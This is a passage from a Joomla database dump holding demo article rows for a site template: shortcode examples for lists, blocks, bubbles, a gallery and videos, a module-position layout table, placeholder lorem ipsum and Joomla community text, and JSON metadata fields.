Texts[/dropcap]]</pre>\r\n<p>[/col]</p>\r\n<p>[/row]</p>\r\n<p>[row]</p>\r\n<h3>Lists example</h3>\r\n<p>[col class=\"span6\"]</p>\r\n<ul>\r\n<li>This is a sample <strong>unordered list</strong></li>\r\n</ul>\r\n<ul class=\"arrow\">\r\n<li>ul with class <strong>arrow</strong></li>\r\n</ul>\r\n<ul class=\"arrow-double\">\r\n<li>ul with class <strong>arrow-double</strong></li>\r\n</ul>\r\n<ul class=\"tick\">\r\n<li>ul with class <strong>tick</strong></li>\r\n</ul>\r\n<ul class=\"cross\">\r\n<li>ul with class <strong>cross</strong></li>\r\n</ul>\r\n<ul class=\"star\">\r\n<li>ul with class <strong>star</strong></li>\r\n</ul>\r\n<ul class=\"rss\">\r\n<li>ul with class <strong>rss</strong></li>\r\n</ul>\r\n<p>[/col]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<ol>\r\n<li>This is a sample <strong>ordered list</strong></li>\r\n</ol>\r\n<ul class=\"arrow\">\r\n<li>ul with class <strong>arrow</strong></li>\r\n</ul>\r\n<ul class=\"arrow-double\">\r\n<li>ul with class <strong>arrow-double</strong></li>\r\n</ul>\r\n<ul class=\"tick\">\r\n<li>ul with class <strong>tick</strong></li>\r\n</ul>\r\n<ul class=\"cross\">\r\n<li>ul with class <strong>cross</strong></li>\r\n</ul>\r\n<ul class=\"star\">\r\n<li>ul with class <strong>star</strong></li>\r\n</ul>\r\n<ul class=\"rss\">\r\n<li>ul with class <strong>rss</strong></li>\r\n</ul>\r\n<p>[/col]</p>\r\n<p>[/row]</p>\r\n<h3>Block Number</h3>\r\n<p>[row][col class=\"span4\"] [blocknumber type=\"circle\" text=\"01\" color=\"#FFF\" background=\"#34bcf5\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<p>[blocknumber type=\"circle\" text=\"02\" color=\"#FFF\" background=\"#aacb24\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<p>[blocknumber type=\"circle\" text=\"03\" color=\"#FFF\" background=\"#f16a10\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<pre>[[blocknumber type=\"circle\" text=\"01\" color=\"#FFF\" background=\"#f16a10\"]Circle Block Number[/blocknumber]]</pre>\r\n<p>[/col]</p>\r\n<p>[col class=\"span4\"] [blocknumber type=\"rounded\" text=\"01\" color=\"#FFF\" background=\"#7d2828\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<p>[blocknumber type=\"rounded\" text=\"02\" color=\"#FFF\" background=\"#d80000\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<p>[blocknumber type=\"rounded\" text=\"03\" color=\"#FFF\" background=\"#329491\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<pre>[[blocknumber type=\"rounded\" text=\"01\" color=\"#FFF\" background=\"#329491\"]Rounded Block Number[/blocknumber]]</pre>\r\n<p>[/col]</p>\r\n<p>[col class=\"span4\"] [blocknumber text=\"01\" color=\"#FFF\" background=\"#999\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<p>[blocknumber text=\"02\" color=\"#FFF\" background=\"#666\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<p>[blocknumber text=\"03\" color=\"#FFF\" background=\"#000\"]Lorem ipsum dolor sit amet consectetuer rutrum dignissim et neque id.[/blocknumber]</p>\r\n<pre>[[blocknumber text=\"01\" color=\"#FFF\" background=\"#999\"]Normal Block Number[/blocknumber]]</pre>\r\n<p>[/col]<span style=\"line-height: 1.3em;\">[/row]</span></p>\r\n<h3>Block Examples </h3>\r\n<p>[row][col class=\"span4\"]</p>\r\n<p>[block color=\"#FFF\" background=\"#34bcf5\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<p>[block color=\"#FFF\" background=\"#aacb24\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<p>[block color=\"#FFF\" background=\"#f16a10\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<pre>[[block color=\"#FFF\" background=\"#f16a10\"]Content[/block]]</pre>\r\n<p>[/col]</p>\r\n<p>[col class=\"span4\"]</p>\r\n<p>[block type=\"rounded\" color=\"#FFF\" background=\"#7d2828\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<p>[block type=\"rounded\" color=\"#FFF\" background=\"#329491\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<p>[block type=\"rounded\" color=\"#FFF\" background=\"#000000\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<pre>[[block type=\"rounded\" color=\"#FFF\" background=\"#000000\"]Lorem ipsum dolor[/block]]</pre>\r\n<p>[/col]</p>\r\n<p>[col class=\"span4\"]</p>\r\n<p>[block border=\"1px dashed #CCC\" padding=\"14px 15px\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<p>[block border=\"3px solid #34bcf5\" padding=\"12px 15px\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<p>[block type=\"rounded\" border=\"5px solid #aacb24\" padding=\"10px 15px\"]Lorem ipsum dolor sit amet, sic genero nomine Piscatore mihi. Dicis Deducitur potest flens praemio quod non dum veniens indica enim.[/block]</p>\r\n<pre>[[block border=\"5px solid #aacb24\" padding=\"10px 15px\"]Lorem ipsum dolor[/block]]</pre>\r\n<p>[/col]</p>\r\n<p>[/row]</p>\r\n<h3>Bubble Examples</h3>\r\n<p>[row][col class=\"span4\"]</p>\r\n<p><span style=\"line-height: 1.3em;\">[bubble author=\"Betty D. Steward\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed ligula orci, ullamcorper vitae sodales venenatis, feugiat et felis. Donec non dui velit, a posuere dui.[/bubble]</span></p>\r\n<p><span style=\"line-height: 1.3em;\">[/col][col class=\"span4\"]</span></p>\r\n<p><span style=\"line-height: 1.3em;\">[bubble color=\"#FFF\" background=\"#736357\" author=\"Barbara J. Pennebaker\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed ligula orci, ullamcorper vitae sodales venenatis, feugiat et felis. Donec non dui velit, a posuere dui.[/bubble]</span></p>\r\n<p><span style=\"line-height: 1.3em;\">[/col]</span><span style=\"line-height: 1.3em;\">[col class=\"span4\"]</span></p>\r\n<p><span style=\"line-height: 1.3em;\">[bubble background=\"transparent\" border=\"3px solid #ccc\" author=\"Chad M. Simmons\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed ligula orci, ullamcorper vitae sodales venenatis, feugiat et felis. Donec non dui.[/bubble]</span></p>\r\n<p><span>[/col]</span></p>\r\n<p><span style=\"line-height: 1.3em;\">[/row]</span></p>\r\n<p><span style=\"line-height: 1.3em;\">[row][col class=\"span12\"]</span></p>\r\n<p> </p>\r\n<pre>[[bubble background=\"#FFF\" color=\"#666\" border=\"3px solid #ccc\" author=\"Chad M. Simmons\"]Lorem ipsum dolor sit amet.[/bubble]]</pre>\r\n<p><span style=\"line-height: 1.3em;\">[/col]</span><span style=\"line-height: 1.3em;\">[/row]</span></p>','',-2,0,0,10,'2013-01-31 11:57:09',135,'','2013-02-14 11:14:05',439,0,'0000-00-00 00:00:00','2013-01-31 11:57:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',91,0,6,'','',1,747,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(18,56,'Module Position','module-position','','<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4><span>Header-Wrapper</span></h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>logo</td>\r\n<td>account</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Breadcrumb</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>breadcrumb</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Menu</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>menu</td>\r\n<td>search</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Banner</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>banner</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Slide</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>slide</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Features</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>feature</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Users</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>user1</td>\r\n<td>user2</td>\r\n<td>user3</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Main Top</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>maintop</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Main Body</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>component</td>\r\n<td>right</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Gallery</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>gallery</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>User Bottom</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>user-bottom1</td>\r\n<td>user-bottom2</td>\r\n<td>user-bottom3</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Main Bototm</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>mainbottom</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Bottom</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>bottom1</td>\r\n<td>bottom2</td>\r\n<td>bottom3</td>\r\n<td>bottom4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"table table-bordered table-striped center\">\r\n<thead>\r\n<tr><th colspan=\"6\">\r\n<h4>Footer</h4>\r\n</th></tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td>footer1</td>\r\n<td>footer2</td>\r\n<td>footer3</td>\r\n</tr>\r\n</tbody>\r\n</table>','',-2,0,0,10,'2013-02-04 07:49:29',135,'','2013-10-07 11:05:09',135,0,'0000-00-00 00:00:00','2013-02-04 07:49:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',28,0,4,'','',1,121,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(16,54,'Gallery','gallery','','<p>[gallery columns=\"4\" filter=\"yes\"]</p>\r\n<p>[gallery_item tag=\"joomla\" src=\"/images/stories/muziejus/rsz_muziejus1.jpg\" /]</p>\r\n<p>[gallery_item tag=\"wordpress\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[gallery_item tag=\"joomla, wordpress\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[gallery_item tag=\"magento\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[gallery_item tag=\"opencart\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[gallery_item tag=\"magento, opencart\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[gallery_item tag=\"joomla, magento, wordpress, opencart\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[gallery_item tag=\"drupal\" src=\"images/helix/gallery/300x200.png\" /]</p>\r\n<p>[/gallery]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[gallery columns=\"4\" filter=\"yes\"]\r\n[gallery_item tag=\"joomla\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"wordpress\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"joomla, wordpress\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"magento\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"opencart\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"magento, opencart\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"joomla, magento, wordpress, opencart\" src=\"images/helix/gallery/300x200.png\"/]\r\n[gallery_item tag=\"drupal\" src=\"images/helix/gallery/300x200.png\"/]\r\n[/gallery]]\r\n</pre>','',-2,0,0,11,'2013-02-04 06:47:55',135,'','2014-04-10 08:56:32',135,0,'0000-00-00 00:00:00','2013-02-04 06:47:55','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',31,0,0,'','',1,177,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(17,55,'Video','video','','<p>[row]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<p>[spvideo]https://www.youtube.com/watch?v=vb2eObvmvdI[/spvideo]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[spvideo]http://www.youtube.com/watch?v=vb2eObvmvdI[/spvideo]]</pre>\r\n<p>[/col]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<p>[spvideo]http://vimeo.com/3701346[/spvideo]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[spvideo]http://vimeo.com/3701346[/spvideo]]</pre>\r\n<p>[/col]</p>\r\n<p>[/row]</p>','',1,0,0,10,'2013-02-04 06:56:51',135,'','2013-06-19 08:17:54',960,0,'0000-00-00 00:00:00','2013-02-04 06:56:51','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',34,0,5,'','',1,145,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(19,57,'The Joomla Blog','the-joomla-blog','','<p>Joomla! means All Together, and it is a community of people all working and having fun together that makes Joomla! possible. Thousands of people each year participate in the Joomla! community, and we hope you will be one of them.</p>\r\n<p>People with all kinds of skills, of all skill levels and from around the world are welcome to join in. Participate in the <a href=\"http://joomla.org\">Joomla.org</a> family of websites (the<a href=\"http://forum.joomla.org\"> forum </a>is a great place to start). Come to a <a href=\"http://community.joomla.org/events.html\">Joomla! event</a>. Join or start a <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Whether you are a developer, site administrator, designer, end user or fan, there are ways for you to participate and contribute.</p>','',-2,0,0,8,'2013-01-31 07:27:02',135,'','2013-02-04 09:19:32',439,0,'0000-00-00 00:00:00','2013-01-31 07:27:02','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,2,'','',1,58,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(20,58,'The Joomla overview','the-joomla-overview','','<p>Joomla! means All Together, and it is a community of people all working and having fun together that makes Joomla! possible. Thousands of people each year participate in the Joomla! community, and we hope you will be one of them.</p>\r\n<p>People with all kinds of skills, of all skill levels and from around the world are welcome to join in. Participate in the <a href=\"http://joomla.org\">Joomla.org</a> family of websites (the<a href=\"http://forum.joomla.org\"> forum </a>is a great place to start). Come to a <a href=\"http://community.joomla.org/events.html\">Joomla! event</a>. Join or start a <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Whether you are a developer, site administrator, designer, end user or fan, there are ways for you to participate and contribute.</p>','',-2,0,0,8,'2013-01-31 07:27:02',135,'','2013-02-04 09:20:04',439,0,'0000-00-00 00:00:00','2013-01-31 07:27:02','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,1,'','',1,68,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(21,59,'The Joomla Help','the-joomla-help','','<p>Joomla! means All Together, and it is a community of people all working and having fun together that makes Joomla! possible. Thousands of people each year participate in the Joomla! community, and we hope you will be one of them.</p>\r\n<p>People with all kinds of skills, of all skill levels and from around the world are welcome to join in. Participate in the <a href=\"http://joomla.org\">Joomla.org</a> family of websites (the<a href=\"http://forum.joomla.org\"> forum </a>is a great place to start). Come to a <a href=\"http://community.joomla.org/events.html\">Joomla! event</a>. Join or start a <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Whether you are a developer, site administrator, designer, end user or fan, there are ways for you to participate and contribute.</p>','',-2,0,0,8,'2013-01-31 07:27:02',135,'','2013-02-04 09:20:24',439,0,'0000-00-00 00:00:00','2013-01-31 07:27:02','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,0,'','',1,29,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(22,61,'College of Arts & Sciences','college-of-arts-sciences','','<p>Adipisicing elit, sed do eiusmod tempor incidi dunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. Quis nostrud exercitation ullamco. laboris nisi ut aliquip ex ea commodo consequat.</p>\r\n','\r\n<p> </p>',-2,0,0,12,'2013-09-23 10:31:59',135,'','2013-10-08 10:22:24',135,0,'0000-00-00 00:00:00','2013-09-23 10:31:59','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/featured\\/feature6.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/featured\\/feature6.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,5,'','',1,774,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(23,62,'College of Communication','college-of-communication','','<p>Adipisicing elit, sed do eiusmod tempor incidi dunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. Quis nostrud exercitation ullamco.laboris nisi ut aliquip ex ea commodo consequat.</p>\r\n','\r\n<p> </p>',-2,0,0,12,'2013-09-23 10:33:21',135,'','2013-10-08 10:20:30',135,0,'0000-00-00 00:00:00','2013-09-23 10:33:21','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/featured\\/feature3.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/featured\\/feature3.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,4,'','',1,722,'{\"robots\":\"\",\"author\":\"\",\